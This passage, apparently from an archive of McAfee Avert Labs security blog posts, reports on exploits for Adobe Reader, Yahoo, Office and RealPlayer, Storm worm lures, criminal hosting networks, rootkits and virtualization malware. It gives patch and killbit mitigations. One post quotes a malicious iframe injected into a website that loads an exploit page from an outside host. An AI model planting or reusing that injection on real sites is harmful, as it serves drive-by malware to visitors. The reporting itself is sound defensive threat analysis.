mapping via procfs. The echo 65536 > /proc/sys/vm/mmap_min_addr
command will set the lowest possible mapping to be at 64K. Note that:

• SELinux must be enabled (in enforcing mode) for this command to take effect.
• Although this setting certainly makes the current exploit fail, there is a nonzero probability that the vulnerability can be exploited without mapping the zero address. I know of no code capable of such exploitation; however, it cannot be ruled out.
• This setting may prevent exploitation of future NULL pointer dereferences vulnerabilities. Very few programs make legitimate use of mapping the zero address.

References

[1]
Linux vmsplice Local Root Exploit By qaaz
[2]
Runtime disable of sys_vmsplice

McAfee Avert Labs is tracking an active exploitation of a recently patched vulnerability in Adobe Acrobat Reader now in the wild. The current vulnerability can be embedded in a PDF file and manipulated through Adobe JavaScript.

The first evidence of such maliciously crafted PDF files was posted to an Italian message forum from an alert administrator who noted that three of his workstations had been infected. Successful exploitation leads to the embedded JavaScript being executed on the victim’s machine. The script attempts to download a Trojan from an IP address in the Netherlands.

This exploit works for both browser-based and email attack vectors and affects the following Adobe products:

• Adobe Reader 8.1.1 and earlier versions
• Adobe Acrobat Professional, 3D, and Standard 8.1.1 and earlier versions

Complete mitigation requires upgrading Acrobat and Adobe Reader 7.x and 8.x to Version 8.1.2.

Malware authors will find this technique of using exploit-laden PDF files in spear phishing attacks very profitable–especially since the Portable Document Format (PDF) is a de-facto standard for exchanging electronic documents online. PDF files have traditionally been unfiltered at the gateway and until recently were considered risk free–in contrast to the notorious history associated with Microsoft Office documents.

With the release of Windows Vista and Microsoft Office 2007, however, Microsoft has made it more difficult for attackers to use buffer overflow exploits. Thus we expect to see exploit writers target the lower hanging fruit. Exploiting vulnerabilities in popular applications from Adobe, Apple, or RealPlayer are proving to be just as advantageous and profitable for the bad guys.

We strongly advise users running vulnerable versions of Adobe Reader and Acrobat to update them from the Adobe site. McAfee users are protected against these maliciously crafted PDF files with today’s 5227 DAT release, which detects them as Exploit-PDF.b.

Zero-day vulnerabilities in Yahoo products are not something novel and should be taken very seriously. Last year, we also saw a couple of ActiveX based vulnerabilities in Yahoo Messenger that are still exploited and incorporated into various web-based attack kits. One of the most prolific still is the Yahoo Webcam ActiveX Controls buffer overflow vulnerability .

Yahoo Music Jukebox is free music-management software that lets you play music files, burn CDs, and tune into your favorite Web radio stations. Within a day of the new Yahoo Jukebox zero-day being publicly disclosed on February 2, a fully working exploit was developed and widely circulated in various forums.

The first vulnerability is a stack-based buffer overflow in the overly long “url” parameter passed to the AddButton and AddImage functions in the YMP DataGrid ActiveX control (datagrid.dll).

The second vulnerability is a buffer overflow with a long “bitmapUrl” parameter passed to the AddBitmap function in the YMGMediaGridAx ActiveX control (mediagridax.dll).

This issue has been observed with Mediagridax.dll version 2.2.2.056 and datagrid.dll version 2.2.2.056, which are distributed as part of latest version of Yahoo Music Jukebox 2.2.2.056 and few older Yahoo Messenger versions.

A further temporary workaround for the problem would be to set the killbit for the offending ActiveX controls:

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5F810AFC-BB5F-4416-BE63-E01DD117BD6C}
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{22FD7C0A-850C-4A53-9821-0B0915C96139}

It could be only a matter of time until we see customized versions of these exploits make their way into the wild to be employed by malware authors to infect machines. McAfee customers have been protected from this threat since the 5223 DATS–as JS/Exploit-YahooGrid.

This week, McAfee® Avert® Labs detected a bunch of uninteresting old OLE exploits. The fact that they are old and are still actively being used by malware authors, however, evidently shows that they continue to be a potent threat to many computer users who do not routinely patch their systems.

At least seven maliciously crafted Word documents, touting recent political news, are believed to have taken their content directly off the Internet:

• African countries need to further consolidate macroeconomic stability.doc
• Free Tibet Olympics Protest on Mount Everest.doc
• Hong Kong Parade Supports 19 Million CCP Withdrawals.doc
• DIRECTORY OF TIBET SUPPORT GROUPS IN INDIA.doc
• 2007-07 DRAFT Tibetan MP London schedule.doc
• CHINA’S OLYMPIC TORCH OUT OF TIBET 1.doc
• Disapppeared in Tibet.doc

Each of these documents are designed to install further backdoor or downloader Trojans on systems running unpatched versions of Microsoft Word. Two known Word vulnerabilities are exploited, and should be patched as below:

For McAfee customers, proactive detection is available. For more information about coverage for your setup, go here:

• Exploit-MSWord.b
• Exploit-MS06-027

Once again, we offer the gentle reminder to install the latest security patches from the vendor.

Last night Microsoft released Security Advisory (947563) due to the discovery of a targeted zero-day attack. Microsoft states the following products are vulnerable:

• Microsoft Office Excel 2003 Service Pack 2
• Microsoft Office Excel Viewer 2003
• Microsoft Office Excel 2002
• Microsoft Office Excel 2000
• Microsoft Excel 2004 for Mac

I took a look at previous Office zero-day vulnerabilities that were discovered through active exploitation since the beginning of 2005. As you can see below, there was a seven-month gap in the public disclosure of these vulnerabilities.

Although this bit of trivia is somewhat interesting, it’s difficult to draw meaning from it. It’s possible that the lull exists only in reporting, rather than in the active exploitation itself. Here’s a per-product breakdown of the source of the vulnerabilities:

The last Excel zero-day discovered through exploitation was reported more than 18 months ago.

It’s not a secret anymore; criminal organizations behind a large part of Internet-related frauds are huge and well organized. In the last quarter of 2007, two studies about RBN (Russian Business Network), one of the most well known criminal organizations so far, were published. Last year, I looked at them with great interest. The first is named Uncovering Online Fraud Rings: The Russian Business Network and is available as a webcast recording on the Verisign web site. The second was written by David Bizeul and is named Russian Business Network study.

These papers demonstrate and illustrate that RBN is an empire. It directly or indirectly manages potentially a million sites. Thanks to elaborate intrusive advertising techniques, millions of Internet users visit its fake retail sites every month. Hackers and other cybercriminals also have their stores and outlets there: malware sales, service offers and booby-trapped sites. Pornography and pedophilia always make money there.

In addition to these documents, some particularly thorough stories have been circulating on the Net (papers from Brian Krebs, Washington post and posts on the RBNexploit and Dancho Danchev blogs).

Mailing addresses, name and photos of suspects, detailed lists of machines and autonomous systems as well as many other details were revealed. Because of this, the group has deemed it best to partially disappear. On November 6th, 2007, many network nodes stopped responding. It was not the end of them though; the business has been carefully planned: high-activity sites – those leading the attacks at the time – were not disturbed. Gradually, the affected sites began to re-appear in Russia as well as all over the world. Today, many countries in Southeast Asia are mentioned, but they are not alone. The reorganization is on the move: new retail payment systems for fake products (mainly fake security products and fake video codecs), new legitimate sites hosting tricky banner ads redirecting computers to these fake retail web sites, new Storm (aka Nuwar) worm campaigns achieved by new C&C botnet implementations, new web sites hosting malicious software (like MPack or WebAttacker) and secretly reached after the victims encounter a hidden iFrame during Internet surfing.

People tracking down RBN regularly watch its Autonomous Systems (AS). These are collections of connected IP networks controlled by a single entity and defined by an AS number. The RBNexploit blog and the David Bizeul document are very comprehensive on this subject and various network maps or tables help the reader to understand the complexity of such an organization.

One puzzle piece is known as AS40989. Despite the fact it was not the core center of the RBN activity it is well-known because it seems to be the official name of the group. It is the subject of a new write-up available at the Shadowserver Foundation web site.

This document analyzes the malicious binary activity directed to and commanded by AS40989. From March to November 2007 the researchers collected 2859 pieces of malware which initiated HTTP connections to it. They found an impressive collection of malware: “Gozi, Goldun, Hupigon, Nurech, Nuklus, Pinch, Sinowal, Tibs, Xorpix, various dialers, downloaders, worms, adware, page hijackers, and proxies”. Once again, it demonstrates the professionalism and the size of the group.

Reading material on RBN is abundant. With this post, I only wish to draw your attention to this existing material. It demonstrates the vitality of the new criminal organizations, it also demonstrate that many people, at McAfee and elsewhere, stay tuned into the dark side of the Internet to understand how the situation is constantly changing and to fight against this threat at a worldwide level.

A few weeks back we blogged about malware-laced codecs embedded in various Blogspot domains. Today within hours after the assassination of former Pakistani Prime Minister Benazir Bhutto, malware authors have started capitalizing on this news to spread a new fake codec. This time it is purported to be an assassination video of the former PM.

Claiming to be a New HD Codec, these malware authors attempt to social engineer users into believing they are downloading a legitimate codec for playing the video. At least 10 Blogger websites are observed to be hosting this fake video (at the time of writing this blog) which redirects the users to the typo-squatted domain containing fake codec:

http://video.googl.[removed]

Malicious code hosted on the 3322 domain is not something novel. One of the recent high profile attacks which pointed to a malicious script from the 3322 domain was the Indiatimes Mail hack.

There are a plethora of websites which attempt drive-by installations when unsuspecting users visit websites returning search engine results for “Benazir Bhutto”. Many of these compromised webpages have malicious scripts injected into the webpage which points to the 3322 domain. These webpages contain obfuscated variants of the MS06-014 exploit which is perhaps one of the most popular of all the exploits we see on a daily basis.

This fake Trojan Codec is detected by the current DATS as Puper. The downloaded exploit is detected as VBS/Psyme and the executable is detected as Generic Downloader.c

(Credits to Pradeep Govindaraju for the great malware analysis)

Occasionally we find PC malware that can have an effect on mobile phones or vice versa. The W32/Mobler worm installs SymbOS/MultiDropper.CC to any Windows system it infects. The Symbian malware has no effect on the PC. Similarly SymbOS/Multidropper.CC installs W32/Mobler to the memory card. The mobile version is arguably more effective as inserting a memory card with Mobler into a PC with AutoRun configured is enough to cause an infection.

The malware author was trying to save some effort in the creation of new malware by reusing older malware. This is not the usual case with malware as creators, driven by the need to avoid detection, produce their own code or use newer malware toolkits.

Multi platform exploits
The situation with vulnerability exploits is more complex. While exploits are usually tied very closely to hardware and operating systems, they are also occasionally distributed as source code allowing study and modification. An example of this is the libTIFF exploit used by hackers to install homebrew games on the Sony Playstation Portable(PSP). The PSP libTIFF exploit was subsequently ported to the iPhone and allowed the installation of third party applications. Security researchers later added the libTIFF exploit to a penetration testing framework.

Portable malware knowledge
Penetration testing frameworks help to tie exploits to payloads(e.g. gaining control of a vulnerable system). The frameworks allow the reuse of previous vulnerability research. This helps reduce the work needed by a penetration tester or attacker to fully utilize an exploit. They can write multiple payloads for a single vulnerability exploit.

In a series of blog postings, a security researcher detailed the process he used to port the libTIFF exploit and develop multiple payloads for the iPhone. It helped a bit that the iPhone and Macs are both running versions of OS X. Although they work on different types of CPUs(x86 for Mac; ARM for iPhone), he was able to leverage his Mac payload knowledge to produce iPhone payloads in a few week’s time.

Mobile exploits
This week we saw the release of a number of exploits for a buffer overflow vulnerability in various PC multimedia players. The vulnerability was limited to a specific MP4 video file codec. The exploits, we detect them as Exploit-MP4, were implemented as specially crafted MP4 video files.

There was a possibility that the malformed video files could cause issues on mobile phones. During testing we found that one of the exploits caused certain phones to hang when played. When we investigated further, we discovered that a similar buffer overflow to the PC existed on the phones. While the exploit will only cause a denial of service currently, it is possible that an attacker could develop a more malicious payload for the affected phones. The example of the penetration testing framework shows that it is relatively straightforward for dedicated attackers to use previously gained knowledge to produce mobile exploits in short periods of time.

The term “rootkit” was originally used to refer to toolkits used by root privileged users. This definition has evolved over time. Nowadays, the term rootkit refers to backdoor programs that run with elevated privileges and that are designed to evade detection by users, administrators and rootkit detection software. Rootkits first appeared in China in 2001 and have evolved substantially since then.

These days most rootkits are installed through exploitation of web browser vulnerabilities or from the infection of viruses and worms. In some cases, rootkits are bundled with images that exploit image library flaws to gain access to systems. In other cases, exploits for previously unknown vulnerabilities (zero-day) are placed on web sites and used to hack browsers and install rootkits. For example, exploits for the zero-day vulnerability identified by CVE-2007-0038 were found on many Chinese websites several months before a patch was released. In other cases, popular websites and public forums are hacked. Their content is then modified to include exploits that install rootkits on to user systems. Often, attackers exploit script injection vulnerabilities to gain access to these web sites. They then upload exploits for known issues like MS06-001, MS06-014, MS06-055, MS07-017, Baofeng ActiveX vulnerability, RealPlayer ActiveX vulnerability and so on. In China, many rootkits also spread via malware that targets a popular IM client named QQ. Once a QQ user’s machine has been compromised by a rootkit, it will send messages containing links to malicious websites to all of the friends of the affected QQ user. If these users click the links, they too will be targeted. This method of propagation is widespread and difficult to defend against. Another technique used to spread rootkits includes the addition of malicious programs to pirated software like Windows, Photoshop, Office, etc. People who download and install these pirated programs are infected by the rootkits bundled with them. Since pirated software is popular in China, many machines are infected this way.

Stay tuned for Part 2…..

References:

Rootkit Paper 1
Rootkit Paper 2

For a long time, we spoke regularly about IFRAME injection. This year, many pages belonging to legitimate sites were secretly modified. Many will remember the Italian Job and the thousands of infected sites in the realm of tourism, the car industry, movies and music.

The people behind these attacks love to use highly topical issues in order to attract as many people as possible. This week in my country, the visit by Libyan President Muammar Khadafi is stirring controversy. It has made many headlines in France. No doubt this is why the French Embassy Web Site is now infected by malicious code. Please do not attempt to reach the site, it is still dangerous.

This first iframe, routes the victim to sites hosted through Hong Kong provider. Two further links then redirect the visitor.

From Hong Kong, we move to Russia and Ukraine where exploit and downloaders are used (Exploit-YIMCAM and downloader-AUD).

Once again, we can see how people involved in such attacks use dedicated malicious web sites in various countries to make it difficult to defeat them. It is especially difficult when an ISP accepts to host web sites without verifying the lesser data the criminals enters when they register. The following example I found when I looked at this attack fully demonstrates this:

Recently, I had some friends complain about problems with Real Media files (*.rm/*.rmvb). According to them, after downloading and playing rmvb files, the Real Media Player launched a malicious webpage without prompting. Later, they noticed their OS running noticeably slower. And later still, they found their IM account passwords modified and online gaming accounts stolen.

It appears that the media files they downloaded were created by a hacker and designed to open malicious webpages. I investigated this and found it is quite easy to add a malicious webpage to rmvb files. The hacker used freely available software. These programs include applications which can be used to add events to rmvb files. A time and URL is specified in a text file, then imported into the rmvb file using these programs, and that’s it!. When the rmvb file is opened in RealPlayer, the URL will automatically be opened after the specified time has elapsed. My advice was to scan any downloaded media files with antivirus software before playing it. Another option is to use a different player other than RealPlayer.

Hope you can enjoy Real Media without the malicious webpages!!!

You may have seen a number of news reports in the past day or two on the active exploitation of a Microsoft Access vulnerability. Here is one story by PC World.

The US-CERT’s current activity Web page, “a regularly updated summary of the most frequent, high-impact types of security incidents currently being reported to the US-CERT,” warned about this active exploitation on December 10.

It is rumored that the vulnerability being exploited is CVE-2007-6026.

Avert Labs is working to find out more. As they say in the press, watch this space!

While we wait, here’s what we know about CVE-2007-6026. It’s a stack overflow in Access. A user would have to open a specially crafted Access database for an attack to take place. Although user assistance is required for exploitation, an exploit could be delivered over various attack vectors, including the Web, e-mail, and IM. Attacks could be coupled with well-establishing social engineering techniques. And now for the rub: This vulnerability is currently unpatched.

It seems to be about that time to, once again, get out our computer security crystal ball and conjecture about the upcoming year.

Many things are changing. Some are staying the same. In some areas we are in uncharted territory.

Threats are moving quickly to technologies such as VoIP and instant messaging. Virtualization will have a huge impact on both data security and the data security industry itself. Professional and organized criminals continue to drive much of the malicious activity. The complete set of predictions is available for download on McAfee’s Threat Center as well as a bonus episode of our podcast AudioParasitics.

Most of the virus researchers in Avert spend their days analyzing samples coming in from customers. With a good percentage of the samples coming in every day being unknown, there’s plenty to keep us busy, 24/7/365. But what is it like, sorting through an unending stream of samples every day? What does that entail?

It’s a bit like trying to identify a life-form from a disconnected body part. Sometimes the body part is actually the whole animal, but it’s often just a toenail or a feather. There are times where we don’t even get a body part, but a footprint or a piece of the animal’s droppings.

Sometimes we’ll get lucky and it’s an animal whose footprint we know really well, or which has very distinctive feathers. Then we can say “there’s a good chance what you have is a peacock”, based on just that feather. But more often than not, people are dealing with something entirely new or rare. Perhaps this critter only displays its distinctive traits in very specific circumstances.

Of course, our favorite sort of sample is one which is a complete body with a good explanation of where and how the animal was found. Whereas a foot accompanied by no information may get an answer of “This is an amphibian”, more of the animal or more context can increase the odds of us being able to say something more specific: “This is Litoria caerulea - aka the Dumpy Tree Frog. It lives in Australia and it is often found hiding in downspouts.”

So how does someone wishing to submit something for analysis go about doing it?

For starters, include as much info as you can: What version of security product are you using? In the case of our products, what version of the product, what engine and DAT files are you using? Are you seeing detection with some AV product? What filename and virus name was given? Are you seeing strange behavior that you associate with the file?

Getting the whole beast can be a bit more tricky. There’s sort of a continuum of sneakiness, from very spammy looking emails with attachments, to bots which get in through software vulnerabilities and then drop rootkits. If you’re the “lucky” recipient of the easy variety, ZIP up that email and send it to us.)

If your sample falls somewhere on the sneakier side of the spectrum, files can really be scattered all over a machine, and some of them are particularly good at hiding. You may want to try scanning your system with the Rootkit Detective or the Beta DATs from the Avert Tools page. This can help identify more suspicious files.

Maybe you’re pretty astute and you’ve noticed that after you ran a file a strange file, it created hundreds of randomly named files in your Windows directory. We may or may not need more than one of those files. You’ll want to check for duplicates, to make sure. If you know how to generate hashes for a file, just make sure you have one of each unique hash, up to about 10. (If you have something parasitic or polymorphic this will give us a decent representation) If you’re not sure how to create a hash, there are certain programs which can help you. One of my favorites is the CRC option in WinZIP (in Configurations, under the Options menu). This allows you to group by CRC and get rid of any duplicates.

In short, try not to just send a blurry video of Sasquatch (or is that a guy in a gorilla suit?) or to send us a hundred disembodied ant legs. The more thorough and complete the sample, the better the chances of getting a complete picture of what’s plaguing your machine.

McAfee Avert Labs today observed e-mail messages with malicious PDF attachments exploiting the critical Adobe Acrobat Mailto Unspecified PDF File Security Vulnerability (CVE-2007-5020) being spammed in the wild. Successful exploitation leads to a batch file being executed on the victim’s machine that disables the built-in windows firewall and then downloads a password stealer from an ip address located on the RBN network.

Malware authors will find this technique of sending exploit-laden PDF files extremely profitable especially in targeted attacks since the Portable Document Format is the de-facto standard for exchanging electronic documents. PDF files have traditionally been unfiltered at the email gateway and until recently were considered risk free in stark contrast to the notorious history associated with Microsoft Office documents.

But with Microsoft making it difficult for attackers by raising the bar for buffer overflow exploits with the release of Windows Vista and Microsoft Office 2007, we expect to see exploit writers target the lower hanging fruit. Abusing exploits in popular applications such as Adobe, Apple, RealPlayer or Antivirus products are proving to be just as advantageous and profitable for the bad guys. McAfee Avert Labs anticipate spammers in collusion with malware authors to continue exploiting popular application flaws and it is imperative that users are educated on how to avoid becoming a victim.

Users running vulnerable versions of Adobe Reader and Acrobat 8.1 or earlier are strongly advised to update them from the Adobe site. McAfee users are pro-actively protected against Exploit-PDF based threats with the latest dat files.

Earlier today we posted a blog entry: RealPlayer Zero Day Exploit Hits the Web.  Well RealPlayer responded RealQuick.  In less than 24 hours they managed to ship a patch.  That’s what I call rapid response.  Real also states that more information will be posted on their Security Updates & Incident Reports page.

Earlier today McAfee’s Regional Virus Info identified over 250 unique machines reporting Exploit-RealPlay.a detections, 99% of which reside in the US.  This does not mean that each of these systems were vulnerable, but it does mean that in all likelihood thousands of systems worldwide were exposed to the malicious code.

Last night we obtained a sample of a RealPlayer zero day exploit.  RealPlayer 11 Beta, 10.5, and older versions are affected.  Today’s DAT release, version 5145, contains detection under the name Exploit-RealPlay.a.  At this point, exposure appears to be limited, but we can expect public exploit code to surface before too long.  At that point exploitation is likely to follow the path of many other drive-by exploits and become fairly well distributed.

The vulnerability lies in a RealPlayer ActiveX control, and can be mitigated by setting the appropriate kill bit via the registry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
ActiveX Compatibility\{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5} 

While we generally keep this blog research focused (and shy away from mentioning products), zero day exploit announcements seem half-done without some mention of information on how our products deal with the threat.

McAfee product coverage information will be sent out via a McAfee Avert Labs Security Advisory service shortly.  This includes coverage information for the following product lines.

• All McAfee virus scanning technologies that utilize the DAT files, including:
• GroupShield
• LinuxShield
• PortaShield
• Secure Internet Gateway
• Secure Messaging Gateway
• Secure Web Gateway 
• Total Protection (TOPS)
• VirusScan Enterprise
• VirusScan Online
• VirusScan Enterprise Buffer Overflow Protection
• Host IPS
• IntruShield
• Foundstone
• McAfee Network Access Control (MNAC)
• McAfee Policy Auditor and McAfee Remediation Manager compliance

The latest trick Nuwar (aka Storm) plays looks like this:

Like previous variants, the HTML page contains a script that attempts to execute the malicious file hosted on the webserver. However even if this exploit code gets blocked by AV software or not executed at all because of security settings in the browser - the user still has the option to click on the download button and infect their machine.

Make sure you’re protected so you do not join the Storm network!

Nuwar (aka Storm Worm) changed tactics yet again. Now it attempts to lure its victims by a promise of a good laugh at a “Psycho cat”:

If you do click on the URL you get a page loaded with the usual cocktail of exploits etc.:

So, if you’re not running an on-access antivirus you are in trouble. The page itself pretends to be a funny greeting, complete with a ShockWave clip of a laughing kitty with an appropriate and rather infectious (pun intended) laughter audio.

And, of course, pretty much wherever you click on the page, you get nothing but Nuwar.

Š

Following our blog about the significance of web hosting security vs ARP spoofing, our friends from security vendor ESET made an official statement on October 9th, about an ARP attack against their official China website earlier this week. Identical to other ARP attacks, their web pages were found inserted with the following malicious IFRAME link:

<iframe src=http://fs18.net/down{blocked}/yy.htm width=20 height=0 frameborder=0></iframe>

The “yy.htm” web page, detected generically as Exploit-MS06-014 , can download a variety of malware including:

• vip1.htm (Exploit-BaoFeng.a)
• 0.exe (PWS-QQGame)
• kvmxeis.exe (PWS-OnlineGames.a)
• ii.exe (PWS-QQPass.dll)
• SysWin78.Jmp (PWS-QQGame)
• WinSys88.Sys (PWS-QQGame)
• System6.ins (PWS-QQPass.dll)

In 2007, hijacking of popular websites has become one of the many effective malware propagation methods in China. From W32/Fujacks -style web page infection to ARP spoofing, we have seen many important websites reportedly hijacked to host exploits and malware since the end of 2006.

With relatively good success, this means of malware infection and exploitation has also rapidly evolved from common Microsoft vulnerabilities - Exploit-MS06-014, Exploit-MS07-004, etc. to application-level vulnerabilities such as Yahoo Messenger, a Chinese media player called Baofeng and PPStream.

Network intrusion prevention security, web server policies and patch management comes to mind as needed minimum defenses and should to be reviewed by companies both using or offering web services as well as ISPs.

W32/Nuwar aka the Storm worm ever since it debut in Nov 2006 has relentlessly flooded internet users with its ever-changing email campaigns. With the storm worm authors having this uncanny knack of using sensationalist themes that draw public attention, the morbid curiosity it has generated has ensured that is the most blogged about piece of malware this year!

The latest campaign is an HTML formatted email using the Labor Day theme, inviting users to view an online greeting card. A copy of the spammed email is as follows:

The authors have used anchor tags in HTML to mask the greeting card link so that an unsuspecting user does not notice that it actually points to a malicious ip address. Hovering the mouse over this disguised link is a quick and dirty way to reveal the real destination address. Users who fall for this bait are directed to the following Happy Labor Day page.

Everything looks hunky-dory except an unsuspecting user is served an xor’ed exploit cocktail in the background. In addition to the usual Microsoft exploits, QuickTime and WinZip buffer overflow exploits are also attempted on a user’s machine. Given the slim likelihood of vulnerable third party applications being up to date on a user’s machine, it increases the attacker’s chances of a successful exploitation. Especially since most applications do not support automated updates and it is left up to the users to first find out if they have a vulnerable version of the application and then manually patch it.

Enterprise customers have the bandwidth and resources to ensure every machine on the corporate network is fully patched. It is usually home consumers - the low hanging fruit that fall prey to these malicious tactics. For users wanting to check if third party applications on their systems are vulnerable, a free online resource to visit would be the Secunia Software Inspector. Happy Patching

The patches for the Webcam vulnerabilities we reported earlier have been released by Yahoo. We urge Yahoo Messenger users to download the latest Messenger. Thanks to the Yahoo security team for working with us to resolve this issue in a short time. Here’s what you need to know.

I’m excited to announce YAAVB! No doubt you recognize that acronym as “yet another anti-virus book.”

And the book that I am proudly holding in my hands is entitled “AVIEN Malware Defense Guide,” and I contributed a chapter to it.

In its 540 pages we cover the following topics:

1. “Customer Power and AV Wannabes”
2. “Stalkers on Your Desktop”
3. “A Tangled Web” (by yours truly)
4. “Big Bad Botnets”
5. “Creme de la Cybercrime”
6. “Defense-in-depth”
7. “Perilous Outsourcery”
8. “Education in Education”
9. “DIY Malware Analysis”
10. “Antimalware Evaluation and Testing”
11. “AVIEN and AVIEWS: the future”

Here’s the team that worked on this book: David Harley, Ken Bechtel, Michael Blanchard, Henk Diemer, Andrew Lee, Igor Muttik, Bojan Zdrnja, Paul Baccas, Tony Bradley, Ken Dunham, Jim Melnick, Enrique Gonzalez, Judith Harley, Dave Phillips, Paul Schmehl, Robert Vibert, and James Wolfe. I would like to express my sincere thanks to David Harley, who put together this team of professionals and led us through a book-writing exercise. It was fun!

I have not yet read all the chapters, but I know the guys well and expect great contributions from all of them!

The book came out under the umbrella of AVIEN (Anti-Virus Information Exchange Network–www.avien.net). This group was formed around 2001 to exchange information related to malware outbreaks. In recent years, due to the lack of large-scale outbreaks, participants simply share all sorts of security information and enjoy communicating with each other. One of the outcomes is this book.

Finally, the book was published by Syngress, retails for US$59.95 (ISBN-13: 978-1-59749-164-8), and is available from major book stores: http://www.amazon.com/AVIEN-Malware-Defense-Guide-Enterprise/dp/1597491640. So far there are two positive reviews, though both came from the team of authors.

I hope you enjoy the book, and I look forward to reading your valuable comments!

Another exploit targeting a Japanese application is found today. This time, a free decompress tool, LHAZ v1.33, was used in a targeted attack. Maliciously crafted zip files could take advantage of an unidentified vulnerability in this tool and drops a BackDoor-CKB trojan.

Two months ago, we’ve published information about an exploit against a free LHA decompress tool, Lhaca which is quite popular in Japan.

Whilst these tools may not be as widely used as commercial tools, perception could be that such free tools are not worth targeting and are safe to use. Exploit-LHAZ.a is just a reminder that software, Windows or MacOS, English or localized, free, open source or commercial, are subjected to the same security threats.

More details of Exploit-LHAZ.a at http://vil.nai.com/vil/content/v_142976.htm.

[UPDATE]
Yahoo has fixed its Webcam vulnerability. The patches for the Webcam vulnerabilities have been released by Yahoo. We urge Yahoo Messenger users to download the latest Messenger. Thanks to the Yahoo security team for working with us to resolve this issue in a short time. Here’s what you need to know.

[Original blog:]
Earlier today Karthik had blogged about details of a new zero day in Yahoo! Messenger being published on some security forums in China, we got a chance to dig a bit deeper into this and were able to reproduce the vulnerability on Yahoo! Messenger version 8.1.0.413 based on the information provided in the forum. It seems like a classic heap overflow which can be triggered when the victim accepts a webcam invite. Note that this vulnerability is different from the recently patched one in June which exploited the Yahoo! Webcam ActiveX controls. 

We’ve been able to reach Yahoo! security team and have informed them about this issue. 

We recommend the following to users using Yahoo! Messenger Webcam:

1) Don’t accept webcam invites from untrusted sources until a patch for this is released.

2) It’s advisable to block outgoing traffic on TCP port 5100 until the vendor patches this vulnerability.

To mitigate this, we’re releasing our NIPS IntruShield signatures today to protect Yahoo! Messenger users from this threat. We shall keep on monitoring this threat and update if we come across anything.

A post on a Chinese-language security forum claims that there is a zero-day vulnerability in Yahoo Messenger. Researchers at Avert Labs have found that this flaw may allow for user-assisted remote-code execution attacks. No code exploiting this flaw has been published yet.

 We’re currently working with Yahoo to be able to confirm or deny that this is a zero-day.

We’ll keep you updated.

We have been studying the issue of malicious hypervisors for quite some time at McAfee Avert Labs and have come up with several techniques to detect whether the system runs on top of a hypervisor or whether there is a piece of code that is trying to initiate a hypervisor. Our work included, of course, analyzing things like Blue Pill and other similar malicious hypervisors.

Last week I was at BlackHat, and it was a very exciting week in terms of Blue Pill and the virtualization rootkits issue in general. During the BlackHat 2007 Briefings in Las Vegas there were three interesting sessions that relate to virtualization system security and rootkits. I attended those three sessions and had a chance to chat some with three presenters. The main points I would emphasize are the following:

1. Providing a system virtualization facility at the processor level without applying any sound security policy is a serious design flaw.
2. A malware authors’ job is to leverage system design flaws and hence the virtualization rootkits were very expected, including Blue Pill.
3. There is no rootkit that is undetectable even if it installs itself as a hypervisor. The challenge is always in how to repair rootkits once they control some layer in the system architecture
4. There needs to be a more organized effort between hardware virtualization vendors, software hypervisor providers and security companies to ensure the secure deployment of virtualization solutions

Now before I go into what happened during the three sessions at BlackHat, I would like to provide our readers with some background and personal thoughts about this topic. Less than two years ago, both Intel and AMD started to provide virtualization support at the processor level. This support is essentially comprised of a set of processor enhancements that improve traditional software-based virtualization solutions. These integrated features give virtualization software, namely Virtual Machine Monitors (VMMs) and Hypervisors, the ability to take advantage of offloading workloads to the system hardware, enabling more streamlined virtualization software stacks and “near native” performance characteristics. For instance, virtualization-enabled processors allow VMMs to rely on the hardware for isolating and mapping memory between virtual machines. This is achieved by adding another level of indirection for mapping VM-based physical address to host-based physical addresses. Both Intel and AMD also provide an additional level of indirection for mapping VM I/O addresses to host I/O physical address. Virtualizing memory addresses and I/O addresses at the processor level is a great extension that would minimize the work done by today’s software hypervisors. However, in doing that neither Intel nor AMD considered the security risk by providing such a powerful facility in the hardware with no restriction to which software piece could take advantage of it. In theory there have been lots of publications about safer computing initiative and how to use TPM technology to authenticate the piece of software that is initializing the processor into the virtualization mode. But in reality, this was not provided in the first release of the virtualization-aware processors as the hypervisors authentication was not provided at the firmware or BIOS level.

Now think of that with me for a moment – we have now a very powerful un-locked facility in the processor that allows any piece of software running in ring zero (like a device driver) to initialize a processor-supported hypervisor and hence take control of the whole computing environment, including the operating system. Yes, this is true, and it was a serious design flaw. Of course both Intel and AMD designers assumed that operating system kernel developers are the only ones who would care about virtualization and would use that facility provided by their processors, which turned out to be untrue. Joanna Rutkowska (the Blue Pill author) and other people have demonstrated some sample code that would initiate a hypervisor, and since it runs outside the operating a system then it can be considered a rootkit. But as the reader may understand now, there are no secrets there. No undocumented stuff; it is all about a powerful hardware feature that was not protected by any security policy.

Now to make the situation worse, both Intel and AMD are competing in that space and I guess both are trying to get software virtualization vendors to rely on their processor native virtualization support. But software-based hypervisors do more than memory and I/O virtualization. They do binary translation for instance which allows them to control programs execution at the instruction level and control programs response to system interrupts. To accommodate that need, both Intel and AMD provide the ability to exit from the VM to the VMM when a certain instruction is executed or a certain condition takes place inside the VM. For hackers this is a very lucrative feature, so not only can they install a thin hypervisor but they can also control the execution of certain instructions and fake many things from below the operating system, like timestamp counters which used to be a very reliable method for measuring elapsed time. When looking at the Intel and AMD virtualization specification, it does not look like they require many things from the hypervisor. In other words, it is up to the hypervisor to decide on what it wants and what it does not want to virtualize. This by itself lowers the cost of making a malicious hypervisor. Let me conclude this introduction by making the following statements:

• Providing a hardware based virtualization support without protecting it with sound security policy is a major flaw in the system design!!!;
• Hardware assisted hypervisors have the freedom to choose which software execution facility to virtualize and control;
• Blue Pill and other types of malicious hypervisors were anticipated by security experts who are well acquainted with the processor architecture.

I think I have provided quite enough background as well as some personal thoughts on the subject, so let’s move on to talk about what happened at Las Vegas last week. As I said there were three sessions that related to virtualization based malware and Blue Pill:

1. “Don’t Tell Joanna, The Virtualized Rootkit Is Dead,” by Thomas Ptacek, Nate Lawson and Peter Ferrie;
2. “IsGameOver(), anyone?,” by Joanna Rutkowska and Alexander Tereshkin; and
3. “Kick Ass Hypervisoring: Windows Server Virtualization,” by Brandon Baker.

